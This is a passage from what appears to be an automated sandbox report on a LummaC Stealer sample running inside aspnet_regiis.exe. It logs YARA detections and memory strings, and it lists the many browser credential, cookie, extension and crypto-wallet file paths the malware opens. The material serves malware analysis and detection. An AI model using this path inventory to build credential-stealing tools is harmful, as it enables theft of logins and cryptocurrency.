              Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 2096, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: aspnet_regiis.exe, 00000003.00000003.2198915406.000000000368D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
              Source: aspnet_regiis.exe, 00000003.00000003.2198915406.000000000368D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
              Source: aspnet_regiis.exe, 00000003.00000003.2154322168.000000000368B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
              Source: aspnet_regiis.exe, 00000003.00000003.2198915406.000000000368D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: aspnet_regiis.exe, 00000003.00000003.2198933386.0000000003677000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
              Source: aspnet_regiis.exe, 00000003.00000003.2198915406.000000000368D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
              Source: aspnet_regiis.exe, 00000003.00000002.2236456187.0000000003620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: aspnet_regiis.exe, 00000003.00000003.2198979767.000000000368B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
              Source: Yara matchFile source: 00000003.00000002.2236456187.0000000003620000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 2096, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 2096, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
